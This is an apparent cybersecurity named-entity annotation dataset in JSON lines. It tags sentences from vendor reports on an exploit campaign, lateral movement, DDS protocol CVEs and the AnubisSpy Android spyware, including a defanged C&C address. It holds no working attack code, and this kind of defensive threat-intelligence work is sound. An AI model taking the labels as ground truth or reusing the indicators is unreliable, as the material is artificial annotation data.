Kit:","entities":[],"relations":[],"Comments":[]} {"id":5101,"text":"The attackers made multiple attempts to use the exploit days after the vulnerability was patched on February 14, which stresses the importance of applying security updates as they become available.","entities":[{"id":51206,"label":"TIME","start_offset":100,"end_offset":111}],"relations":[],"Comments":[]} {"id":5102,"text":"As part of our efforts to combat serious threat actors, we use results of our research to improve the safety and security of our products.","entities":[],"relations":[],"Comments":[]} {"id":5103,"text":"Upon discovery, all identified websites and domains were added to Safe Browsing to protect users from further exploitation.","entities":[],"relations":[],"Comments":[]} {"id":5104,"text":"We also sent all targeted Gmail and Workspace users government-backed attacker alerts notifying them of the activity.","entities":[{"id":51207,"label":"SOFTWARE","start_offset":26,"end_offset":45}],"relations":[],"Comments":[]} {"id":5105,"text":"We encourage any potential targets to enable Enhanced Safe Browsing for Chrome and ensure that all devices are updated.","entities":[],"relations":[],"Comments":[]} {"id":5106,"text":"TAG is committed to sharing our findings as a way of raising awareness with the security community, and with companies and individuals that might have been targeted or suffered from these activities.","entities":[{"id":51208,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":5107,"text":"We hope that improved understanding of the tactics and techniques will enhance threat hunting capability and lead to stronger user protections across industry.","entities":[],"relations":[],"Comments":[]} {"id":5108,"text":"&nbsp; [Lightly edited transcript of the video above] Hi there, Mark Nunnikhoven from Trend Micro Research, I want to talk to you about the concept of lateral movement.","entities":[{"id":51211,"label":"attack-pattern","start_offset":155,"end_offset":171},{"id":51209,"label":"identity","start_offset":68,"end_offset":84},{"id":51210,"label":"identity","start_offset":90,"end_offset":110}],"relations":[{"id":1071,"from_id":51209,"to_id":51210,"type":"related-to"}],"Comments":[]} {"id":5109,"text":"And the reason why I want to tackle this today is because I've had some conversations in the last few days that have really kind of hit that idea bulb that people don't truly understand how cybercriminals get away with their crimes in the organization.","entities":[],"relations":[],"Comments":[]} {"id":5110,"text":"Specifically how they launch their attacks","entities":[],"relations":[],"Comments":[]} {"id":5111,"text":"Now don't get me wrong, this isn't to blame on defenders.","entities":[],"relations":[],"Comments":[]} {"id":5112,"text":"This isn't to blame of the general public.","entities":[],"relations":[],"Comments":[]} {"id":5113,"text":"I'm going to go with Hollywood's to blame a little bit here, because we're watching movies in Hollywood inevitably…you know the hackers in their dark hat and with no lighting, underground, Lord knows where they find these places to hack from and they are attacking directly through.","entities":[],"relations":[],"Comments":[]} {"id":5114,"text":"You see a bunch of text go across the screen and they penetrate through the first firewall, through the second firewall in into the data.","entities":[],"relations":[],"Comments":[]} {"id":5115,"text":"That's not how it works at all.","entities":[],"relations":[],"Comments":[]} {"id":5116,"text":"That's ridiculous.","entities":[],"relations":[],"Comments":[]} {"id":5117,"text":"It's absurd.","entities":[],"relations":[],"Comments":[]} {"id":5118,"text":"[00:59] It makes for interesting cinema, just like the red code\/green code in CSI Cyber, but it's not a reflection of reality and that's a real challenge.","entities":[],"relations":[],"Comments":[]} {"id":5119,"text":"Because a lot of people don't have the experience of working with cybersecurity, working in cybersecurity, so their only perception is what they see either through media—you know TV, movies, books—or if they happen to run into somebody at in the industry.","entities":[],"relations":[],"Comments":[]} {"id":5120,"text":"So there is an overwhelming amount of sort of information or misinformation.","entities":[],"relations":[],"Comments":[]} {"id":5121,"text":"Not even misinformation, just storytelling that tries to make it far more dramatic than it is.","entities":[],"relations":[],"Comments":[]} {"id":5122,"text":"The reality is that cybercriminals are out for profit.","entities":[],"relations":[],"Comments":[]} {"id":5123,"text":"We know this time and time again—yes a bunch of nation-state stuff does happen but the vast majority of you are unaffected by it same with there's a massive amount of script-kiddie just sort of scanning random people with random tools that are just seeing what they can get away with that and if you have solid, automated defenses that doesn't really impact you.","entities":[],"relations":[],"Comments":[]} {"id":5124,"text":"What does impact you is the vast majority of organized cybercriminals who are out to make a profit.","entities":[],"relations":[],"Comments":[]} {"id":5125,"text":"Trend Micro had a great series and continues to have a great series on the Underground, the Digital Underground that shows just how deep these profit motivations go.","entities":[{"id":51212,"label":"identity","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":5126,"text":"This is very much a dark industry.","entities":[],"relations":[],"Comments":[]} {"id":5127,"text":"And with that in mind we come back to the concept of lateral movement.","entities":[{"id":51213,"label":"attack-pattern","start_offset":53,"end_offset":69}],"relations":[],"Comments":[]} {"id":5128,"text":"[02:22] If an attacker breaches into your systems, whether they come in like a fourth of all attacks do via email whether they come in directly through a server compromise, which is about half of all breaches according to the Verizon data breach investigation report or one of the other methods that is commonly used…then they start to move around within your network.","entities":[],"relations":[],"Comments":[]} {"id":5129,"text":"That's lateral movement.","entities":[{"id":51214,"label":"attack-pattern","start_offset":7,"end_offset":23}],"relations":[],"Comments":[]} {"id":5130,"text":"We talk about north\/south traffic with the network, which is basically inside the network to outside of the network, so out to the the internet and back.","entities":[],"relations":[],"Comments":[]} {"id":5131,"text":"East\/west is within the network itself.","entities":[],"relations":[],"Comments":[]} {"id":5132,"text":"Most defenses, traditional defenses worry about that north\/south traffic.","entities":[],"relations":[],"Comments":[]} {"id":5133,"text":"Not enough worry about the east\/west and it's breaking down finally.","entities":[],"relations":[],"Comments":[]} {"id":5134,"text":"We are getting rid of this hard perimeter.","entities":[],"relations":[],"Comments":[]} {"id":5135,"text":"\"It's mine, I defend everything inside\" …and realizing that this is actually how cybercriminals work.","entities":[],"relations":[],"Comments":[]} {"id":5136,"text":"Once they're inside they move around.","entities":[],"relations":[],"Comments":[]} {"id":5137,"text":"So we need to defend in-depth and have really great monitoring and protection tools within our networks because of this challenge of lateral movement.","entities":[],"relations":[],"Comments":[]} {"id":5138,"text":"[03:23] Let me give you a little easier to digest analogy.","entities":[],"relations":[],"Comments":[]} {"id":5139,"text":"Most of us in a home have a grocery list and maybe once a week—maybe twice–we head to the grocery store and we try to get everything we want off the list and then we come back.","entities":[],"relations":[],"Comments":[]} {"id":5140,"text":"That just makes sense.","entities":[],"relations":[],"Comments":[]} {"id":5141,"text":"That's how we do it.","entities":[],"relations":[],"Comments":[]} {"id":5142,"text":"Right?","entities":[],"relations":[],"Comments":[]} {"id":5143,"text":"You would never think of going, \"Okay.","entities":[],"relations":[],"Comments":[]} {"id":5144,"text":"Number one of the list is ketchup.","entities":[],"relations":[],"Comments":[]} {"id":5145,"text":"I'm going to drive to the store to get ketchup.","entities":[],"relations":[],"Comments":[]} {"id":5146,"text":"I'm going to buy it and I'm going to come back home.","entities":[],"relations":[],"Comments":[]} {"id":5147,"text":"I'm going to look at item number two.","entities":[],"relations":[],"Comments":[]} {"id":5148,"text":"I need a loaf of bread.","entities":[],"relations":[],"Comments":[]} {"id":5149,"text":"I'm going to drive back to the store.","entities":[],"relations":[],"Comments":[]} {"id":5150,"text":"I'm going to buy a loaf of bread and I'm going to come back and we can go to item 3, and I'm going to go and I'm going to come back.","entities":[],"relations":[],"Comments":[]} {"id":5151,"text":"I'm going to...\"","entities":[],"relations":[],"Comments":[]} {"id":5152,"text":"That's just ridiculous, right?","entities":[],"relations":[],"Comments":[]} {"id":5153,"text":"That's absolutely absurd and cybercrimals agree.","entities":[],"relations":[],"Comments":[]} {"id":5154,"text":"Once they've driven to the store.","entities":[],"relations":[],"Comments":[]} {"id":5155,"text":"They're going to buy everything that they need and everything that they see as an opportunity, right?","entities":[],"relations":[],"Comments":[]} {"id":5156,"text":"They are really susceptible to those end caps and impulse buys... and then they're going to leave.","entities":[],"relations":[],"Comments":[]} {"id":5157,"text":"This is how they attack our organizations.","entities":[],"relations":[],"Comments":[]} {"id":5158,"text":"We know that, because of the average time to detect a breach is around 197 days right now and that stat has fluctuated maybe plus or minus 15 days for the last decade.","entities":[],"relations":[],"Comments":[]} {"id":5159,"text":"We also know that it takes almost three…it takes two and a half to three months actually contain a breach once you discover it and the reason for all of this is lateral movement.","entities":[],"relations":[],"Comments":[]} {"id":5160,"text":"Once you're in as a cybercriminal, once you've made headway, once you gained a beachhead or a foothold within that network you're going to do everything you can to expand it because it's going to make you the most amount of money.","entities":[],"relations":[],"Comments":[]} {"id":5161,"text":"[04:55] What do you think?","entities":[],"relations":[],"Comments":[]} {"id":5162,"text":"Let us know in the comments below, hit us up on social @TrendMicro or you can reach me directly @marknca.","entities":[{"id":51216,"label":"identity","start_offset":96,"end_offset":104},{"id":51215,"label":"identity","start_offset":55,"end_offset":66}],"relations":[],"Comments":[]} {"id":5163,"text":"How are you handling lateral movement?","entities":[{"id":51217,"label":"attack-pattern","start_offset":21,"end_offset":37}],"relations":[],"Comments":[]} {"id":5164,"text":"How are you trying to reduce it?","entities":[],"relations":[],"Comments":[]} {"id":5165,"text":"How are you looking for visibility across all of your systems?","entities":[],"relations":[],"Comments":[]} {"id":5166,"text":"Let's continue this conversation because when we talk we all get better and more secure online.","entities":[],"relations":[],"Comments":[]} {"id":5167,"text":" Tags Cloud | APT & Targeted Attacks | Cyber Crime | Expert Perspective | Network | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":5168,"text":"By Federico Maggi, Rainer Vosseler (Trend Micro Research), Mars Cheng, Patrick Kuo, Chizuru Toyama, Ta-Lun Yen (TXOne Networks), Erik Boasson (ADLINK), and Victor Mayoral Vilches (Alias Robotics)","entities":[{"id":51226,"label":"identity","start_offset":129,"end_offset":141},{"id":51222,"label":"identity","start_offset":71,"end_offset":82},{"id":51224,"label":"identity","start_offset":100,"end_offset":110},{"id":51218,"label":"identity","start_offset":3,"end_offset":17},{"id":51220,"label":"identity","start_offset":36,"end_offset":56},{"id":51221,"label":"identity","start_offset":59,"end_offset":69},{"id":51223,"label":"identity","start_offset":84,"end_offset":98},{"id":51225,"label":"identity","start_offset":112,"end_offset":126},{"id":51227,"label":"identity","start_offset":143,"end_offset":149},{"id":51219,"label":"identity","start_offset":19,"end_offset":34},{"id":51228,"label":"identity","start_offset":156,"end_offset":178},{"id":51229,"label":"identity","start_offset":180,"end_offset":194}],"relations":[],"Comments":[]} {"id":5169,"text":"Despite being unknown even to industry practitioners, the Data Distribution Service (DDS) protocol has been in use for more than a decade.","entities":[],"relations":[],"Comments":[]} {"id":5170,"text":"This middleware software technology is responsible for running billions of public and private devices and mechanisms currently in use.","entities":[],"relations":[],"Comments":[]} {"id":5171,"text":" DDS is integral in embedded systems that require real-time machine-to-machine communication, facilitating a reliable communication layer between sensors, controllers, and actuators.","entities":[],"relations":[],"Comments":[]} {"id":5172,"text":"This technology is situated at the beginning of the supply chain as a layer that connects, controls, and monitors applications, sensors, and actuators, aimed at maintaining interoperability and fault tolerance.","entities":[],"relations":[],"Comments":[]} {"id":5173,"text":"It is used in various critical sectors such as healthcare, transportation, industrial internet of things (IIoT), robotics, aeronautics, and the military, among others.","entities":[],"relations":[],"Comments":[]} {"id":5174,"text":"Given these factors, this makes the middleware technology an attractive target for attackers.","entities":[],"relations":[],"Comments":[]} {"id":5175,"text":"We analyzed this software and found multiple security vulnerabilities.","entities":[],"relations":[],"Comments":[]} {"id":5176,"text":"This blog lists 13 identified security gaps that were assigned new CVE IDs found in the six most common DDS implementations, mostly concerning deployment.","entities":[],"relations":[],"Comments":[]} {"id":5177,"text":"We also show a preview of the security gaps we found in the standard’s specification and a summary of our testing procedure.","entities":[],"relations":[],"Comments":[]} {"id":5178,"text":"For details on the known vulnerabilities, attack scenarios, and research methodology, read our full paper “A Security Analysis of the Data Distribution Service (DDS) Protocol.”","entities":[],"relations":[],"Comments":[]} {"id":5179,"text":"All the vulnerabilities found have been disclosed and patched or mitigated by their respective vendors.","entities":[],"relations":[],"Comments":[]} {"id":5180,"text":"New vulnerabilities","entities":[],"relations":[],"Comments":[]} {"id":5181,"text":"We studied six widely used DDS implementations, chosen based on executions’ number of users and customers in the critical sectors globally.","entities":[],"relations":[],"Comments":[]} {"id":5182,"text":" We also looked at each implementation’s real-time publish-subscribe (RTPS) packet, as DDS is dependent on its own lower layer standard protocol.","entities":[],"relations":[],"Comments":[]} {"id":5183,"text":"Notably, we also studied the Robot Operating System 2 (ROS 2) because it uses DDS as its default standard operating system (OS) middleware for all robotics and automation use cases.","entities":[{"id":51230,"label":"SOFTWARE","start_offset":29,"end_offset":61}],"relations":[],"Comments":[]} {"id":5184,"text":"Given the service’s position as a security and operations building block, all vulnerabilities that affect DDS also affect the rest of the software stack, such as RTPS and all ROS 2 instances.","entities":[{"id":51231,"label":"SOFTWARE","start_offset":175,"end_offset":180},{"id":51232,"label":"SOFTWARE","start_offset":162,"end_offset":166}],"relations":[],"Comments":[]} {"id":5185,"text":" Product Name","entities":[],"relations":[],"Comments":[]} {"id":5186,"text":"Developer HQ Region Open Source","entities":[],"relations":[],"Comments":[]} {"id":5187,"text":"Core Language Year Developed Fast-DDS eProsima EMEA Apache License 2.0 C++ 2014 Cyclone DDS Eclipse Foundation project, driven by ADLINK EMEA Eclipse Public License 2.0 and Eclipse Development License 1.0 C 2011 OpenDDS OCI NABU Custom C++ 2005 Connext DDS RTI NABU Extensions are open source C++ 2005 (NDDS – 1995) CoreDX DDS TwinOaks NABU Not open source C 2009 Gurum DDS GurumNetworks APAC Not open source C Table 1.","entities":[],"relations":[],"Comments":[]} {"id":5188,"text":"A list of all DDS implementations analyzed for this research.","entities":[],"relations":[],"Comments":[]} {"id":5189,"text":"MITRE ATT&CK ICS Attack Surface Vector CVE Scope CVSS Weaknesses (CWE) T0804:","entities":[{"id":51233,"label":"identity","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} {"id":5190,"text":"Brute Force I\/O T0814: DoS T0827: Loss of Control T0880: Loss of Safety T0802: Automated Collection T0846: Remote System Discovery T0856: Spoof of Reporting Message","entities":[{"id":51234,"label":"attack-pattern","start_offset":138,"end_offset":164},{"id":15964,"label":"attack-pattern","start_offset":0,"end_offset":11},{"id":15966,"label":"attack-pattern","start_offset":79,"end_offset":99},{"id":15967,"label":"attack-pattern","start_offset":107,"end_offset":130}],"relations":[],"Comments":[]} {"id":5191,"text":" Network RTPS discovery packet CVE-2021-38425 Fast-DDS, ROS 2 7.5 CWE-406: Network amplification CVE-2021-38429 OpenDDS, ROS 2 7.5 CVE-2021-38487 Connext DDS, ROS 2 7.5 CVE-2021-43547 CoreDX DDS, ROS 2 7.5 Malformed RTPS packet CVE-2021-38447 OpenDDS, ROS 2 8.6 CWE-405:","entities":[{"id":51235,"label":"vulnerability","start_offset":31,"end_offset":45},{"id":51237,"label":"vulnerability","start_offset":131,"end_offset":145},{"id":51238,"label":"vulnerability","start_offset":169,"end_offset":183},{"id":51239,"label":"vulnerability","start_offset":228,"end_offset":242},{"id":51236,"label":"vulnerability","start_offset":97,"end_offset":111}],"relations":[],"Comments":[]} {"id":5192,"text":"Network amplification CVE-2021-38445 OpenDDS, ROS 2 7.0 CWE-130: Improper handling of length CVE-2021-38423 Gurum DDS, ROS 2 8.6 CWE-131: Incorrect calculation of buffer size CVE-2021-38435 Connext DDS, ROS 2 8.6 CVE-2021-38439 Gurum DDS, ROS 2 8.6 CWE-122:","entities":[{"id":51240,"label":"vulnerability","start_offset":22,"end_offset":36},{"id":51241,"label":"vulnerability","start_offset":93,"end_offset":107},{"id":51242,"label":"vulnerability","start_offset":175,"end_offset":189},{"id":51243,"label":"vulnerability","start_offset":213,"end_offset":227}],"relations":[],"Comments":[]} {"id":5193,"text":"Heap-based buffer overflow T0862: Supply Chain Compromise T0839: Module Firmware T0873: Project File Infection","entities":[{"id":51244,"label":"attack-pattern","start_offset":88,"end_offset":110},{"id":15977,"label":"attack-pattern","start_offset":11,"end_offset":26},{"id":15978,"label":"attack-pattern","start_offset":34,"end_offset":57}],"relations":[],"Comments":[]} {"id":5194,"text":" Configuration XML file CVE-2021-38427 Connext DDS, ROS 2 6.6 CWE-121: Stack-based buffer overflow CVE-2021-38433 Connext DDS, ROS 2 6.6 CVE-2021-38443 Cyclone DDS, ROS 2 6.6 CWE-228: Improper handling of syntactically invalid structure CVE-2021-38441 Cyclone DDS, ROS 2 6.6 CWE-123:","entities":[{"id":51247,"label":"vulnerability","start_offset":99,"end_offset":113},{"id":51248,"label":"vulnerability","start_offset":137,"end_offset":151},{"id":51245,"label":"attack-pattern","start_offset":71,"end_offset":98},{"id":51246,"label":"vulnerability","start_offset":24,"end_offset":38},{"id":51249,"label":"vulnerability","start_offset":237,"end_offset":251}],"relations":[],"Comments":[]} {"id":5195,"text":"Write-what-where condition Table 2.","entities":[],"relations":[],"Comments":[]} {"id":5196,"text":"A summary of our findings across the main DDS implementations and standard specification.","entities":[],"relations":[],"Comments":[]} {"id":5197,"text":" When the security gaps on the network attack surface are exploited, it allows an attacker to perform spoofing, reconnaissance, automated data collection, and denial of service (DoS), affecting the control of an exposed system.","entities":[],"relations":[],"Comments":[]} {"id":5198,"text":"Meanwhile, the vulnerabilities we found on the configuration attack surface can be abused to affect the DDS developer or system integrator, potentially compromising the integrity of the software supply chain.","entities":[],"relations":[],"Comments":[]} {"id":5199,"text":"Vulnerabilities in the standard specification","entities":[],"relations":[],"Comments":[]} {"id":5200,"text":"The built-in RTPS discovery protocol is used in peer-to-peer networks to discover the locator of each participant (such as IP address and UDP\/TCP port or offset in shared memory).","entities":[],"relations":[],"Comments":[]} {"id":5201,"text":"The “chatty” nature of this discovery protocol and the fact that it expects a reply from each contacted participant, paired with easy-to-spoof transport protocols such as the User Datagram Protocol (UDP), make RTPS vulnerable to network reflection and amplification.","entities":[{"id":51250,"label":"attack-pattern","start_offset":229,"end_offset":265}],"relations":[],"Comments":[]} {"id":5202,"text":"Confidentiality and authenticity for this data is not protected even with DDS Security, making it possible for an attacker to spoof the information. CVE ID","entities":[],"relations":[],"Comments":[]} {"id":5203,"text":"Scope","entities":[],"relations":[],"Comments":[]} {"id":5204,"text":"Partially Mitigated*","entities":[],"relations":[],"Comments":[]} {"id":5205,"text":"BAF Percentage of Attack Duration (Total experiment duration = 139s) CVE-2021-38425 Fast-DDS, ROS 2 master branch 9.875 100.0 CVE-2021-38429 OpenDDS, ROS 2 >= 3.18.1 18.68 24.17 CVE-2021-38487","entities":[{"id":51251,"label":"vulnerability","start_offset":70,"end_offset":84},{"id":51252,"label":"vulnerability","start_offset":127,"end_offset":141},{"id":51253,"label":"vulnerability","start_offset":179,"end_offset":193}],"relations":[],"Comments":[]} {"id":5206,"text":"Connext DDS, ROS 2 >= 6.1.0 2.011 84.17 CVE-2021-43547 CoreDX DDS, ROS 2 > 5.9.1 32.82 18.14 Table 3.","entities":[{"id":51254,"label":"vulnerability","start_offset":40,"end_offset":54}],"relations":[],"Comments":[]} {"id":5207,"text":"The network reflection and amplification vulnerability with bandwidth amplification factor (BAF) is calculated as the ratio between outbound and reflected traffic.","entities":[{"id":51256,"label":"vulnerability","start_offset":4,"end_offset":96}],"relations":[],"Comments":[]} {"id":5208,"text":"Note: Implementations with less than 100% attack duration likely have a timeout mechanism.","entities":[],"relations":[],"Comments":[]} {"id":5209,"text":"(*) A full mitigation will require relevant changes in the RTPS specification.","entities":[],"relations":[],"Comments":[]} {"id":5210,"text":" The longest running node was based on Connext DDS (at 139 seconds), which we kept as a reference.","entities":[],"relations":[],"Comments":[]} {"id":5211,"text":"Table 3 shows that the BAF is greater than one, implying there are asymmetric network flows although the values are at the order of magnitude lower than modern amplification attacks (note that Memcached can reach 10,000 to 51,000 BAF).","entities":[],"relations":[],"Comments":[]} {"id":5212,"text":"However, the network bandwidth in embedded systems is also lower than, for example, what internet nodes can provide.","entities":[],"relations":[],"Comments":[]} {"id":5213,"text":"An attacker can abuse this built-in discovery feature for remote discovery and fingerprinting.","entities":[],"relations":[],"Comments":[]} {"id":5214,"text":"We sent RPTS discovery probes to the entire IPv4 space (except for the no-scan subnets) and received answers from 643 hosts (excluding obvious honeypots).","entities":[],"relations":[],"Comments":[]} {"id":5215,"text":"Notably, hosts never stopped sending traffic to us, even if we only sent them a single 288-byte packet.","entities":[],"relations":[],"Comments":[]} {"id":5216,"text":"This new network-reflection vulnerability that we found is not the only instance of a specification-level vulnerability.","entities":[],"relations":[],"Comments":[]} {"id":5217,"text":"Security researchers from different organizations have been documenting and creating attack scenarios abusing these vulnerabilities as early as 2015.","entities":[{"id":51257,"label":"TIME","start_offset":144,"end_offset":148}],"relations":[],"Comments":[]} {"id":5218,"text":"Conclusion","entities":[],"relations":[],"Comments":[]} {"id":5219,"text":"Proper supply chain management processes allow contextualization, tracking, and monitoring of new vulnerabilities within different downstream software using a specific library such as DDS.","entities":[],"relations":[],"Comments":[]} {"id":5220,"text":"In the case of this middleware technology, DDS is just one of the many critical libraries used in embedded applications that’s easy to lose track of.","entities":[],"relations":[],"Comments":[]} {"id":5221,"text":"Our paper, “A Security Analysis of the Data Distribution Service (DDS) Protocol,” includes short- and long-term mitigation best practices and recommendations, as well as a consideration for adopting a shift-left approach.","entities":[],"relations":[],"Comments":[]} {"id":5222,"text":"We also acknowledge the cooperation and engaging response that some vendors like ADLINK have adopted when we approached them with our findings.","entities":[{"id":51258,"label":"identity","start_offset":81,"end_offset":87}],"relations":[],"Comments":[]} {"id":5223,"text":"As we encourage more DDS researchers, users, and implementors to keep on studying and promoting security awareness for the DDS ecosystem, we hope the level of engagement we received can serve as a model for the software industry.","entities":[],"relations":[],"Comments":[]} {"id":5224,"text":"Download our full paper here.","entities":[],"relations":[],"Comments":[]} {"id":5225,"text":" Tags Exploits & Vulnerabilities | Research | Cyber Threats | ICS OT | APT & Targeted Attacks | Compliance & Risks | IoT | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":5226,"text":"Android malware like ransomware exemplify how the platform can be lucrative for cybercriminals.","entities":[{"id":51259,"label":"SOFTWARE","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":5227,"text":"But there are also other threats stirring up as of late: attacks that spy on and steal data from specific targets, crossing over between desktops and mobile devices.","entities":[],"relations":[],"Comments":[]} {"id":5229,"text":"These were published on Google Play — but have since been taken down — and third-party app marketplaces.","entities":[{"id":51261,"label":"SOFTWARE","start_offset":24,"end_offset":35}],"relations":[],"Comments":[]} {"id":5230,"text":"We named these malicious apps AnubisSpy (ANDROIDOS_ANUBISSPY) as all the malware’s payload is a package called watchdog.","entities":[{"id":51263,"label":"malware","start_offset":111,"end_offset":119},{"id":51262,"label":"malware","start_offset":41,"end_offset":60},{"id":16073,"label":"malware","start_offset":30,"end_offset":39}],"relations":[{"id":1072,"from_id":51262,"to_id":16073,"type":"duplicate-of"}],"Comments":[]} {"id":5231,"text":"We construe AnubisSpy to be linked to the cyberespionage campaign Sphinx (APT-C-15) based on shared file structures and command-and-control (C&C) server as well as targets.","entities":[{"id":51265,"label":"campaign","start_offset":65,"end_offset":83},{"id":51264,"label":"malware","start_offset":12,"end_offset":21}],"relations":[],"Comments":[]} {"id":5232,"text":"It’s also possible that while AnubisSpy’s operators may also be Sphinx’s, they could be running separate but similar campaigns.","entities":[{"id":51266,"label":"campaign","start_offset":64,"end_offset":70},{"id":16081,"label":"malware","start_offset":30,"end_offset":39}],"relations":[],"Comments":[]} {"id":5233,"text":" What can AnubisSpy do?","entities":[{"id":16085,"label":"malware","start_offset":10,"end_offset":19}],"relations":[],"Comments":[]} {"id":5234,"text":" AnubisSpy can steal messages (SMS), photos, videos, contacts, email accounts, calendar events, and browser histories (i.e., Chrome and Samsung Internet Browser).","entities":[{"id":51267,"label":"malware","start_offset":1,"end_offset":10},{"id":51268,"label":"attack-pattern","start_offset":15,"end_offset":35},{"id":51269,"label":"SOFTWARE","start_offset":125,"end_offset":131},{"id":51270,"label":"SOFTWARE","start_offset":136,"end_offset":160}],"relations":[],"Comments":[]} {"id":5235,"text":"It can also take screenshots and record audio, including calls.","entities":[],"relations":[],"Comments":[]} {"id":5236,"text":"It can spy on the victim through apps installed on the device, a list of which is in its configuration file that can be updated.","entities":[],"relations":[],"Comments":[]} {"id":5237,"text":"This includes Skype, WhatsApp, Facebook, and Twitter, among others.","entities":[{"id":51273,"label":"SOFTWARE","start_offset":31,"end_offset":39},{"id":51271,"label":"SOFTWARE","start_offset":14,"end_offset":19},{"id":51272,"label":"SOFTWARE","start_offset":21,"end_offset":29},{"id":51274,"label":"SOFTWARE","start_offset":45,"end_offset":52}],"relations":[],"Comments":[]} {"id":5238,"text":"After the data are collected, they are encrypted and sent to the (C&C) server.","entities":[],"relations":[],"Comments":[]} {"id":5239,"text":"AnubisSpy can also self-destruct to cover its tracks.","entities":[{"id":16104,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":5240,"text":"It can run commands and delete files on the device, as well as install and uninstall Android Application Packages (APKs).","entities":[],"relations":[],"Comments":[]} {"id":5241,"text":"AnubisSpy has several modules, each of which has a separate role.","entities":[{"id":51275,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":5242,"text":"AnubisSpy’s code is well constructed, indicating the developer\/s’ know-how.","entities":[{"id":51276,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":5243,"text":"Below is a visualization of the modules: Figure 1: Structure of AnubisSpy’s modules","entities":[{"id":51277,"label":"malware","start_offset":64,"end_offset":73}],"relations":[],"Comments":[]} {"id":5244,"text":"How is AnubisSpy related to Sphinx?","entities":[{"id":51278,"label":"campaign","start_offset":28,"end_offset":34},{"id":16114,"label":"malware","start_offset":7,"end_offset":16}],"relations":[],"Comments":[]} {"id":5245,"text":" Sphinx reportedly uses the watering hole technique via social media sites to deliver its payloads — mainly a customized version of njRAT.","entities":[{"id":51279,"label":"campaign","start_offset":1,"end_offset":7},{"id":51280,"label":"malware","start_offset":132,"end_offset":137}],"relations":[{"id":1073,"from_id":51279,"to_id":51280,"type":"uses"}],"Comments":[]} {"id":5246,"text":"The Sphinx campaign operators cloaked the malware with icons of legitimate applications to dupe recipients into clicking them.","entities":[{"id":51281,"label":"campaign","start_offset":4,"end_offset":10}],"relations":[],"Comments":[]} {"id":5247,"text":"Sphinx was active between June 2014 and November 2015, but timestamps of the malware indicate the attacks started as early as 2011.","entities":[{"id":51283,"label":"TIME","start_offset":26,"end_offset":35},{"id":51285,"label":"TIME","start_offset":126,"end_offset":130},{"id":51282,"label":"campaign","start_offset":0,"end_offset":6},{"id":51284,"label":"TIME","start_offset":40,"end_offset":53}],"relations":[],"Comments":[]} {"id":5248,"text":"A simple WHOIS query of AnubisSpy’s C&C server showed it abused a legitimate managed hosting service provider in Belize.","entities":[{"id":51286,"label":"location","start_offset":113,"end_offset":119},{"id":16127,"label":"malware","start_offset":24,"end_offset":33}],"relations":[],"Comments":[]} {"id":5249,"text":"We correlated the AnubisSpy variants to Sphinx’s desktop\/PC-targeting malware through the following: Shared C&C server, 86[.]105[.]18[.]107 Shared technique of decrypting JSON files, and similarity between the file structures of AnubisSpy and Sphinx’s malware Similar targets (highly concentrated in Middle Eastern countries) Figure 2: Comparison of file structure in Sphinx’s desktop\/PC-targeting malware (left) and AnubisSpy (right)","entities":[{"id":51288,"label":"malware","start_offset":18,"end_offset":27},{"id":51287,"label":"location","start_offset":301,"end_offset":315},{"id":16131,"label":"IPV4","start_offset":121,"end_offset":140},{"id":16134,"label":"malware","start_offset":230,"end_offset":239},{"id":16130,"label":"campaign","start_offset":40,"end_offset":46},{"id":16142,"label":"malware","start_offset":422,"end_offset":431},{"id":16140,"label":"campaign","start_offset":373,"end_offset":379},{"id":16136,"label":"campaign","start_offset":244,"end_offset":250}],"relations":[{"id":1074,"from_id":16130,"to_id":51288,"type":"uses"},{"id":1075,"from_id":16131,"to_id":16130,"type":"indicates"},{"id":1076,"from_id":16136,"to_id":51287,"type":"targets"},{"id":1077,"from_id":16134,"to_id":51287,"type":"targets"}],"Comments":[]} {"id":5251,"text":"Our coordination with Google also revealed that these apps were installed across a handful of countries in the Middle East.","entities":[{"id":51291,"label":"identity","start_offset":22,"end_offset":28},{"id":51292,"label":"location","start_offset":111,"end_offset":122}],"relations":[],"Comments":[]} {"id":5252,"text":" Was AnubisSpy actively distributed?","entities":[{"id":51293,"label":"malware","start_offset":5,"end_offset":14}],"relations":[],"Comments":[]} {"id":5253,"text":"We analyzed seven apps that were actually AnubisSpy.","entities":[{"id":51294,"label":"malware","start_offset":42,"end_offset":51}],"relations":[],"Comments":[]} {"id":5254,"text":"These were signed with the same fake Google certificates.","entities":[],"relations":[],"Comments":[]} {"id":5255,"text":"We found two more apps created by the same developer, but they had no espionage-related codes; we think they were made as experimental projects.","entities":[],"relations":[],"Comments":[]} {"id":5256,"text":"Based on hardcoded strings in the Agent Version, the malicious apps were developed as early as April 2015.","entities":[{"id":51295,"label":"TIME","start_offset":95,"end_offset":105}],"relations":[],"Comments":[]} {"id":5257,"text":"Timestamps indicate that the earliest sample was signed on June 2015; the latest variant was signed on May 2017.","entities":[{"id":51296,"label":"TIME","start_offset":59,"end_offset":68},{"id":51297,"label":"TIME","start_offset":103,"end_offset":111}],"relations":[],"Comments":[]} {"id":5258,"text":"AnubisSpy wasn’t only published on Google Play.","entities":[{"id":51299,"label":"SOFTWARE","start_offset":35,"end_offset":46},{"id":51298,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":5259,"text":"We also found versions of it in third-party app marketplaces, most likely as a way to expand the malware’s reach.","entities":[],"relations":[],"Comments":[]} {"id":5260,"text":"The apps mainly used Middle East-based news and sociopolitical themes as social engineering hooks and abused social media to further proliferate.","entities":[{"id":51300,"label":"attack-pattern","start_offset":73,"end_offset":91},{"id":51301,"label":"attack-pattern","start_offset":102,"end_offset":121}],"relations":[],"Comments":[]} {"id":5261,"text":"Versions of AnubisSpy posed as social news, promotional, healthcare, and entertainment apps.","entities":[{"id":51302,"label":"malware","start_offset":12,"end_offset":21}],"relations":[],"Comments":[]} {"id":5262,"text":"What does AnubisSpy mean to the mobile landscape?","entities":[{"id":16180,"label":"malware","start_offset":10,"end_offset":19}],"relations":[],"Comments":[]} 